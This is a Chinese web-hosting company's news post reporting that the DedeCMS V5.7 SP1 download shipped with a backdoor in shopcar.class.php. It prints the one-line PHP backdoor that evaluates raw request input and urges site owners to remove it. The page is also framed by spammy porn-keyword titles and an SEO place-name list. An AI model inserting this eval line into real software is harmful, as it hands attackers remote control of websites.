校园春色亚洲色图_亚洲视频分类_中文字幕精品一区二区精品_麻豆一区区三区四区产品精品蜜桃

主頁 > 網站建設 > 建站知識 > Dedecms V5.7被植入后門可成功入侵控制網站

Dedecms V5.7被植入后門可成功入侵控制網站

POST TIME:2019-09-30 11:11

昨日,烏云漏洞平臺發布最新報告稱,著名開源建站軟件Dedecms V5.7 SP1正式版被植入后門,通過該后門可成功入侵并控制使用dedecms的網站。

Dedecms被曝植入后門

據烏云報告,被植入的后門是在/include/shopcar.class.php文件中,被植入的代碼為@eval(file_get_contents(‘php://input’));,烏云介紹稱,通過該后門可成功入侵dedecms網站。有網友對植入的該后門予以證實,稱其在2012-3-18 19:08下載的DedeCMS-V5.7-UTF8-SP1.tar.gz 有此代碼。

據了解,@eval(file_get_contents(‘php://input’));是將請求的數據流作為腳本語言執行,通過該后門,可以上傳PHP后門來控制整個網站。使用Dedecms V5.7 SP1正式版建站的站長,需立即對后門代碼進行刪除,以保護網站安全。

Dedecms是一款開源建站軟件,其最早是由IT柏拉圖個人開發,并在2007年進行了公司化運作。目前,國內有不少網站都使用了Dedecms系統,不過在Dedecms創始人IT柏拉圖的離開后,Dedecms屢次被曝出安全漏洞問題。截至發稿,Dedecms官方尚未對該漏洞進行任何回應。



收縮
  • 微信客服
  • 微信二維碼
  • 電話咨詢

  • 400-1100-266
主站蜘蛛池模板: 赫章县| 察哈| 永兴县| 云浮市| 察哈| 垦利县| 宜州市| 汉川市| 玉门市| 当阳市| 沙田区| 扶风县| 峨眉山市| 基隆市| 黄梅县| 嫩江县| 罗江县| 云梦县| 海南省| 九龙城区| 桓台县| 乌鲁木齐县| 拜城县| 金华市| 呼图壁县| 南平市| 房山区| 宜州市| 江川县| 彰化市| 渝中区| 新密市| 衡阳县| 津南区| 芷江| 乌兰浩特市| 浮梁县| 桐庐县| 怀来县| 大兴区| 平乡县|